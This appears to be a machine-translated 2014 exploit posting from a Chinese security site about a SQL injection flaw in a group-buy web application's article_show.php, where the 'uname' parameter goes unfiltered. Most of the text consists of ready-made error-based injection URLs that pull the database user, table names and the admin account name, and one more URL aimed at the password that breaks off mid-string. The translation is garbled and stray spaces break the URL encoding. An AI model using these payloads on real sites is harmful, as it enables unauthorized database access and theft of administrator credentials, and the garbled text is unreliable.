Dimensions buy system sql vulnerability affects to the latest 4. Version 2-bug warning-the black bar safety net

2014-04-10T00:00:00
ID MYHACK58:62201444405
Type myhack58
Reporter 佚名
Modified 2014-04-10T00:00:00

Description

Before using this buy system of the free don't know how to now start charging like

This vulnerability also in several low version has always been there!

Vulnerability file: app/source/article_show.php

<? php

if ($_REQUEST ["m"] == "Article" && $_REQUEST ["a"] == "showByUname") {

$uname = $_REQUEST["uname"]; //no filter

if($uname!="")

{

$uname = rawurldecode($uname);// not affected by GPC effects

.......... The following code omitted

So the obvious injection there is also a N version of it.

There is an explosion path vulnerability: mapi/comm.php

exp:

http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%2527or%2 0 1=%28select%2 0 1%20from%2 0%28select%20count%2 8%2 9,concat%28floor%28rand%2 8 0%2 92%2 9,%28select%20user%2 8% 2 9% 2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b%2 9% 2 5 2 3

Get the first table, the key is the prefix

http://www.sitedirsec.com//index.php?m=Article&a=showByUname&uname=%27or%2 0 1%3D%28select%2 0 1%20from%2 0%28select%20count%2 8%2 9%2Cconcat%28floor%28rand%2 8 0% 2 92%2 9%2C%28select%20table_name%20from+information_schema. columns+where+table_schema%3Ddatabase%2 8% 2 9%20limit%2 0 0%2C1%2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b%2 9% 2 3

Account acquisition

http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%2 0 1%3D%28select%2 0 1%20from%2 0%28select%20count%2 8%2 9%2Cconcat%28floor%28rand%2 8 0% 2 92%2 9%2C%28select%20adm_name%20from%20fanwe_admin%20limit%2 0 0%2C1%2 9%29a%20from%20information_schema. tables%20group%20by%20a%29b%2 9% 2

To obtain the password, there is a need to intercept, I don't know for the hair

http://www.sitedirsec.com/index.php?m=Article&a=showByUname&uname=%27or%2 0 1%3D%28select%2 0 1%20fr